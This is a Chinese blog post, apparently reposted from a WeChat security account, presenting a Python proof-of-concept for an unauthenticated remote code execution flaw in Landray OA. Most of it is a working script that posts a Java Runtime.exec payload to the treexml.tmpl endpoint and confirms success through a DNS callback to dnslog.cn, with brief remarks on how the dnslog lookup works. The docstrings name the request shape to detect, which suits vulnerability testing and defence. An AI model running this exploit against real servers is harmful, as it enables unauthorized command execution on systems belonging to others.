简单 PoC 编写：以最近的蓝凌未授权 RCE 为例（Python）
2022-8-7 15:47:25 Author: 红蓝攻防实验室(查看原文) 阅读量:167 收藏

这里我们借助 Burp 的辅助工具来帮我们构造前期的请求包，这样就只需要专注于逻辑处理。

这样就可以用 Python 对这个数据包发起请求。

好了，不废话，上正文。

蓝凌未授权 RCE PoC

import argparse
import random
import string
import sys
import time

import requests

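def random_str(n):
    """Return a string of ``n`` random lowercase ASCII letters (a-z).

    Used as a throwaway PHPSESSID value for dnslog.cn.  ``random`` is not a
    cryptographic source; that is acceptable here because the value only
    separates one lookup session from another.

    Args:
        n: number of characters to produce; 0 yields "".

    Returns:
        A str of length ``n`` drawn from a-z.
    """
    # random.choices is the stdlib idiom for "k draws with replacement"; the
    # original built the string with += and a local named ``str`` that shadowed
    # the builtin.
    return "".join(random.choices(string.ascii_lowercase, k=n))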

# One PHPSESSID value for the whole run: dnslog.cn's getdomain.php and
# getrecords.php are tied together by this cookie, so both lookups must send
# the same value.
cookie = random_str(26)

# Browser-like headers shared by the dnslog lookups.
headers = dict([
    ("Cache-Control", "max-age=0"),
    ("Upgrade-Insecure-Requests", "1"),
    ("User-Agent", "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10; rv:100.0) Gecko/20000101 Firefox/100.0"),
    ("Accept", "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9"),
    ("Accept-Encoding", "gzip, deflate"),
    ("Accept-Language", "zh-CN,zh;q=0.9"),
    ("Connection", "close"),
])

def get_domain_or_check(type):
    """Talk to dnslog.cn: fetch a fresh subdomain (type 1) or poll its records (type 2).

    Both branches send the module-level ``cookie`` as PHPSESSID, which is what
    makes the getrecords poll return the records for the domain handed out by
    getdomain.  Neither request sets a timeout, so a slow dnslog.cn blocks the
    script.  ``type`` shadows the builtin of the same name.

    Args:
        type: 1 to request a domain, 2 to poll for records.  Any other value
            matches no branch and the function returns None.

    Returns:
        The raw response text of getdomain.php for type 1 (returned without
        checking the HTTP status, so an error page would be passed through to
        the caller); None otherwise.
    """
    if type == 1:
        url = "http://www.dnslog.cn:80/getdomain.php"
        cookies = {"PHPSESSID": cookie}
        res = requests.get(url, headers=headers, cookies=cookies)
        print("[+] dnslog:" + res.text)
        return res.text
    elif type == 2:
        # The query-string value is a fixed cache-buster copied from the browser request.
        url = "http://dnslog.cn:80/getrecords.php?t=0.18836534176098696"
        cookies = {"PHPSESSID": cookie}
        # Give the target's DNS resolution a moment to be logged before polling.
        time.sleep(0.8)
        res = requests.get(url, headers=headers, cookies=cookies)
        # NOTE(review): the > 2 test presumably treats an empty record list
        # (e.g. "[]") as "no callback" — confirm against dnslog.cn's response format.
        if len(res.text) > 2:
            print("[+] Success 漏洞存在: " + res.text)
        else:
            print("[+] 漏洞不存在")

def test(url):
    """Send the treexml.tmpl probe to ``url`` and check dnslog.cn for a DNS callback.

    The probe is a POST to data/sys-common/treexml.tmpl with ``s_bean`` set to
    ruleFormulaValidate and a ``script`` parameter that runs ``ping <dnslog
    domain>``.  From a defensive point of view that request shape — that path,
    that ``s_bean`` value, and a ``script`` body containing
    ``Runtime.getRuntime().exec`` — is the thing to alert on or block, and an
    application server resolving a dnslog.cn name is the corresponding outbound
    signal.

    Args:
        url: base URL of the target; a trailing slash is optional.  An empty
            string raises IndexError at ``url[-1]``.

    Returns:
        None.  Outcome is printed: a 200 status triggers the dnslog poll, any
        other status is reported as not vulnerable.  A 200 alone does not
        prove anything; only the dnslog record does.
    """
    cmd = "ping " + get_domain_or_check(1)
    # Local ``headers`` shadows the module-level dict of the same name.
    headers = {
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36",
        "Connection": "close",
        "Accept": "*/*",
        "Accept-Language": "en",
        "Content-Type": "application/x-www-form-urlencoded",
        "Pragma": "no-cache",
        "Accept-Encoding": "gzip, deflate"}
    # ``cmd`` is already a str, so the str() call is redundant.
    data = {"s_bean": "ruleFormulaValidate",
            "script": "try {String cmd = \"" + str(
                cmd) + "\";Process process = Runtime.getRuntime().exec(cmd);} catch (IOException e) {System.err.println(e);}"}
    if url[-1] != "/":
        url = url + "/data/sys-common/treexml.tmpl"
    else:
        url = url + "data/sys-common/treexml.tmpl"
    # No timeout: a non-responsive host blocks here indefinitely.
    res = requests.post(url, headers=headers, data=data)
    if res.status_code == 200:
        get_domain_or_check(2)
    else:
        print("[+] 状态码" + str(res.status_code) + " 漏洞不存在")

def parse_args():
    """Parse the command line; the single option is the required -u/--url target."""
    usage_hint = "\tExample: \r\npython {} -u target".format(sys.argv[0])
    parser = argparse.ArgumentParser(epilog=usage_hint)
    # Retitles the default option group; ``_optionals`` is a private argparse
    # attribute, so this may break on a future argparse release.
    parser._optionals.title = "OPTIONS"
    parser.add_argument("-u", "--url", required=True, type=str, help="url.")
    return parser.parse_args()

if __name__ == '__main__':
    # Banner in bold green (ANSI escape), then run the single probe.
    print("\033[1;32mAuthor: by567 暗\033[0m")
    args = parse_args()
    url = args.url
    test(url)

这里分析了 dnslog 的 getdomain.php 和 getrecords.php，用它们来获取 dnslog 的测试结果。

通过 getdomain.php 获取测试用的 dnslog 域名；这里 PHPSESSID 要设置成我们自己构造的值，之后查询结果时才能获取到记录。

接着就是发起请求，并对返回的数据包进行分析处理。

代码写得比较 low，大佬勿喷。


文章来源: http://mp.weixin.qq.com/s?__biz=MzU2OTkwNzIxOA==&mid=2247483952&idx=1&sn=019733f010b3e8ddc090a8285521fa59&chksm=fcf6c34dcb814a5b1274b5a6895e0b282abcd77993efb896fb00a0f2e89ae26fce9018ec6e1f#rd